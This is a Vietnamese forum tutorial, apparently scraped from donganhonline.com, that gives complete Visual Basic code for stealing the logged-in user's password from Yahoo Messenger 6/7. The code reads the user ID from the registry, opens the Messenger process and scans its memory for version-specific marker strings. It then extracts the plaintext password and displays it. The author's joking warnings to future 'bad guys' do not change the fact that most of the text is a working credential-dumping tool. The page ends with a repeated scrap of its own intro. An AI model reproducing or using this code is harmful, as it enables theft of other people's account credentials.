LấymậtkhẩukhiđangChattrênYahoo home Xuất xứ : www.donganhonline.com (phuongthanh37) Binh khí sử dụng : Không Nói qua : Có một số bạn hỏi tui rằng cái này có phải là lấy của chế độ tự động đăng nhập không nhưng không nó sẽ đọc trực tiếp bộ nhớ của YahooMát sa ge (7.x). Chú ý : Nếu có vị “Độc giả” anò sau khi đọc sau “Món” này âm mưu viết chương trình ăn cắp mậtkhẩu thì sẽ “Tự lãnh hậu quả” đó. Lý do ??? Rất đơn giản quá trình đọc Regedit tuân thủ theo nguyên tắc của mấy chú “Virus” thường dung => AV “Bụp” liền. Như vậy để đủ “Trình độ” để làm “Người xấu” ta phải làm gì ??? Ồ tôi sẽ không nói cho các bạn đâu hehehehehe vì nếu tui nói thì chính tui (Dũng còi) sẽ làm gia tằng thêm số lượng hác cơ lơ tơ mơ như vậy thì “Họa” mất. Như vậy mún làm người xấu thì “Các ngừơi xấu của tương lai” hãy chịu khó học hỏi thêm đi nha. À “Chiêu thức “ này còn đang có nhiều tranh cãi nên chưa chắc chắn 100% nha (Riêng tui thành Test thành công) Đoạn mã : 'Cac API va bien se su dung Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, _ ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress _ As Long, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Declare Function GetWindowThreadProcessId Lib "user32" _ (ByVal hwnd As Long, lpdwProcessId As Long) As Long Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _ (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Private Const PROCESS_VM_READ = 16 'Function de doc Registry Function DocKey(StrValue As String) Dim OBJ As Object On Error Resume Next Set OBJ = CreateObject("wscript.shell") DocKey = OBJ.RegRead(StrValue) End Function 'Phan noi dung chinh Dump Pass tu bo nho ra Function YM_Dump(StrTmp As String, Adr As Long) As String Dim Y_Pid, Y_Proc, bfLg As Long Dim sss As String Dim res&, ant& Dim u As Integer 'Tim can cua so chinh cua Y!M yahoobuddymain = FindWindow("yahoobuddymain", vbNullString) 'Lay IdProcess Y!M tu ca'n Hwnd GetWindowThreadProcessId yahoobuddymain, Y_Pid 'Mo Process Y!M de xu ly Y_Proc = OpenProcess(PROCESS_ALL_ACCESS, False, Y_Pid) 'Neu ko mo duoc bao loi va ket thuc If Y_Proc = 0 Then MsgBox "Khong thay YM!, Chay Y!M da nao", vbCritical: Exit Function DoEvents 'Scan Pass tu offset 3600000 => 4100000 j = 3600000 Do j = j + 1 'Xu ly tung mang 2048 byte For I = 0 To 2048 ReadProcessMemory Y_Proc, j + I, bfLg, 1, 0& 'Neu thay ky tu 0 thi chuyen tiep de kiem tra If bfLg = 0 Then GoTo asd 'Cong don tung ky tu doc duoc sss = sss & Chr(bfLg) DoEvents Next asd: If sss = StrTmp Then Exit Do 'Xac dinh cum ky tu co dinh sss = "" Loop Until j = 4100000 sss = "" 'Lay pass tu bo nho ra For I = 0 To 2048 'Tu cum ky tu co dinh tim den offset chua pass de lay ra ReadProcessMemory Y_Proc, (j + 8) + I, bfLg, 1, 0& If bfLg = 0 Then CloseHandle P_Proc: YM_Dump = sss: Exit Function sss = sss & Chr(bfLg) DoEvents Next DoEvents End Function Private Sub Form_Load() On Error Resume Next 'Lay ID tu trong Registry txtID = DocKey("HKEY_CURRENT_USER\Software\yahoo\pager\Yahoo! User ID") 'KT co phai phien ban Y!M 7.0 DocKey ("HKEY_CURRENT_USER\Software\yahoo\pager\v70") 'Ton trong tac gia va ban than bang cach giu nguyen ten tac gia 'Dump & Coded by PhuongThanh37 'phuongthanh37@donganhol.com http://donganhol.com If Err.Number & lt & gt Then 'Dump Pass voi Y!M 6 va cum tu co dinh la "@W9" txtPass = YM_Dump("@W9", 8) Else 'Dump Pass voi Y!M 7 va cum tu co dinh la "q`c" txtPass = YM_Dump("q" & Chr(31) & "`c", 8) End If 'Dua ket qua ra MsgBox "Dump & Coded by phuongthanh37" + vbLf + _ "phuongthanh37@donganhol.com Visit: http://donganhol.com" + vbLf + vbLf + _ "Yahoo! ID : " & txtID & vbLf + _ "Password : " & txtPass, 32, "Oh oh Dump pass Y!M in VB" End End Sub . Lấy mật khẩu khi đang Chat trên Yahoo home Xuất xứ : www.donganhonline.com (phuongthanh37) Binh. đọc sau “Món” này âm mưu viết chương trình ăn cắp mật khẩu thì sẽ “Tự lãnh hậu quả” đó. Lý do ??? Rất đơn giản quá trình đọc Regedit tuân thủ theo nguyên